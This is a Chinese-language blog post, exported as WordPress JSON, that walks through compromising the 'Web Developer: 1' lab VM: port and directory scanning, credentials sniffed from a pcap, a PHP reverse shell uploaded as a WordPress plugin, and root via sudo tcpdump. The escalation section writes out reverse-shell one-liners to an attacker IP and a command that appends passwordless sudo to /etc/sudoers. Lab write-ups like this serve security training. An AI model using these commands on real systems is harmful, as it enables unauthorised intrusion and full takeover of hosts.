{"id":324,"date":"2024-05-04T09:06:13","date_gmt":"2024-05-04T01:06:13","guid":{"rendered":"http:\/\/xiyu12.top\/?p=324"},"modified":"2024-05-04T09:06:13","modified_gmt":"2024-05-04T01:06:13","slug":"web-developer-1","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=324","title":{"rendered":"WEB DEVELOPER: 1"},"content":{"rendered":"\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n
sudo nmap -sT --min-rate 10000 -p- 192.168.1.144\n[sudo] password for user: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for 192.168.1.144\nHost is up (0.0013s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT   STATE SERVICE\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 00:0C:29:11:96:36 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 3.30 seconds\n<\/code><\/pre>\n\n\n\n
Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 08:53 CST\nNmap scan report for 192.168.1.144\nHost is up (0.00053s latency).\n\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)\n|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)\n|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Example site &#8211; Just another WordPress site\n|_http-generator: WordPress 4.9.8\nMAC Address: 00:0C:29:11:96:36 (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 8.27 seconds\n<\/code><\/pre>\n\n\n\n
\u76ee\u5f55\u626b\u63cf\u53ef\u4ee5\u591a\u5c11\u51e0\u4e2a\u5b57\u5178 \uff08\u5f53\u6ca1\u6709\u5934\u7eea\u7684\u65f6\u5019\u53ef\u4ee5\u626b\u4e24\u5230\u4e09\u4e2a\uff09<\/p>\n\n\n\n
\u76ee\u5f55\u626b\u63cf \u4f7f\u7528 gobuster  \u5e38\u7528\u7684\u5b57\u5178\u662f\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/p>\n\n\n\n
\u540c\u65f6  kali \u4e2d\u8fd8\u6709\u5f88\u591a\u76ee\u5f55\u5b57\u5178\/usr\/share\/wordlists\/dirb\/big.txt<\/p>\n\n\n\n
 gobuster dir -u http:\/\/192.168.1.144  --wordlist=\/usr\/share\/wordlists\/dirb\/big.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.1.144\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.htpasswd            (Status: 403) [Size: 297]\n\/.htaccess            (Status: 403) [Size: 297]\n\/ipdata               (Status: 301) [Size: 315] [--> http:\/\/192.168.1.144\/ipdata\/]\n\/server-status        (Status: 403) [Size: 301]\n\/wp-content           (Status: 301) [Size: 319] [--> http:\/\/192.168.1.144\/wp-content\/]\n\/wp-admin             (Status: 301) [Size: 317] [--> http:\/\/192.168.1.144\/wp-admin\/]\n\/wp-includes          (Status: 301) [Size: 320] [--> http:\/\/192.168.1.144\/wp-includes\/]\nProgress: 20469 \/ 20470 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n
gobuster dir -u http:\/\/192.168.1.144  --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.1.144\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/wp-content           (Status: 301) [Size: 319] [--> http:\/\/192.168.1.144\/wp-content\/]\n\/wp-includes          (Status: 301) [Size: 320] [--> http:\/\/192.168.1.144\/wp-includes\/]\n\/wp-admin             (Status: 301) [Size: 317] [--> http:\/\/192.168.1.144\/wp-admin\/]\n\/server-status        (Status: 403) [Size: 301]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\n\n\n
wpscan –url http:\/\/192.168.1.144 -e u    \u53d1\u73b0\u4e86wordpress cms  \u53ef\u4ee5\u5148\u626b\u4e00\u4e0b \u7528\u6237\u540d   webdeveloper<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n
\u8bbf\u95ee\u4e0a\u9762 \u626b\u63cf\u5230\u7684\u76ee\u5f55     http:\/\/192.168.1.144\/ipdata\/<\/a><\/p>\n\n\n\n
\u4e0b\u8f7d\u5230\u4e00\u4e2a \u6d41\u91cf\u5305  analyze.cap  \u7528wireshark \u6253\u5f00<\/p>\n\n\n\n
\u5728packet  list  \u4e2d\u641c\u7d22  wp-login   \u7136\u540e  follow   tcp \u6d41    \u627e\u5230\u8d26\u6237\u7684\u7528\u6237\u548c\u5bc6\u7801<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728wordpress \u540e\u53f0\u767b\u9646<\/p>\n\n\n\n
wordpress  getshell<\/strong><\/p>\n\n\n\n
\u5728  plugins  \u4e0a\u4f20\u4e00\u4e2a\u63d2\u4ef6 add new      \u4e0a\u4f20\u4e00\u4e2aphp \u53cd\u5f39shell    <\/p>\n\n\n\n
\u7136\u540e\u5728  media   \u4e2d\u627e\u5230  \u53cd\u5f39shell   \u7136\u540e\u8bbf\u95ee\u53cd\u5f39shell  <\/p>\n\n\n\n
nc -lvp 1234<\/p>\n\n\n\n
\u83b7\u5f97shell<\/p>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n
cd \/var\/www\/html<\/p>\n\n\n\n
cat  wp-config.php<\/p>\n\n\n\n
\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine('DB_NAME', 'wordpress');\n\/** MySQL database username *\/\ndefine('DB_USER', 'webdeveloper');\n\/** MySQL database password *\/\ndefine('DB_PASSWORD', 'MasterOfTheUniverse');\n\/** MySQL hostname *\/\ndefine('DB_HOST', 'localhost');\n\/** Database Charset to use in creating database tables. *\/\ndefine('DB_CHARSET', 'utf8mb4');\n\/** The Database Collate type. Don't change this if in doubt. *\/\n<\/code><\/pre>\n\n\n\n
mysql -u webdeveloper -pMasterOfTheUniverse\nshow databases;\nuse wordpress;\nshow tables;\nselect * from wp-users;\n\u83b7\u5f97\u4e00\u4e2a\u51ed\u8bc1  \u89e3\u5f00\u540e\u53d1\u73b0\u662fweb \u767b\u9646\u7684\u51ed\u8bc1<\/code><\/pre>\n\n\n\n
\u8fd9\u65f6\u5019\u6709\u4e00\u70b9\u8ff7\u832b  \u6ca1\u6709\u5934\u7eea  \u7684\u65f6\u5019 \u6240\u6709\u7684\u51ed\u8bc1\u90fd\u8981\u4f7f\u7528\u4e00\u904d\u5728\u6bcf\u4e00\u4e2a\u5730\u65b9<\/p>\n\n\n\n
\u4f7f\u7528mysql \u7684\u51ed\u8bc1  \u53ef\u4ee5\u767b\u9646 ssh<\/p>\n\n\n\n
sudo -l<\/p>\n\n\n\n
sudo -l\n[sudo] password for webdeveloper: \nMatching Defaults entries for webdeveloper on webdeveloper:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser webdeveloper may run the following commands on webdeveloper:\n    (root) \/usr\/sbin\/tcpdump<\/code><\/pre>\n\n\n\n
COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w \/dev\/null -W 1 -G 1 -z $TF -Z root\n\u6211\u5229\u7528\u5931\u8d25\u4e86<\/code><\/pre>\n\n\n\n
cd \/tmp\nvim .test    \u524d\u9762\u51e0\u79cd\u90fd\u4e0d\u6210\n#\/bin\/bash -c \"bash -i >& \/dev\/tcp\/192.168.1.138\/1234 0>&1\"\n#nc -e \/bin\/bash 192.168.1.138 1234\n#<?php\n#exec(\"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.1.138\/1234 0>&1'\");\n#?>\necho \" webdeveloper ALL=(ALL) NOPASSWD: ALL\" >> \/etc\/sudoers\nchmod +x \/tmp\/.test\nsudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/.test -Z root\n\n\nsudo -l\nsudo  su\n\u83b7\u5f97root<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u76ee\u5f55\u626b\u63cf\u53ef\u4ee5\u591a\u5c11\u51e0\u4e2a\u5b57\u5178 \uff08\u5f53\u6ca1\u6709\u5934\u7eea\u7684\u65f6\u5019\u53ef\u4ee5\u626b\u4e24\u5230\u4e09\u4e2a\uff09 \u76ee\u5f55\u626b\u63cf \u4f7f\u7528 gobuster  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[33,93,99,100,113],"class_list":["post-324","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-gobuster","tag-sudo-tcpdump","tag-wireshark","tag-wordpress","tag-113"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=324"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/324\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=324"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}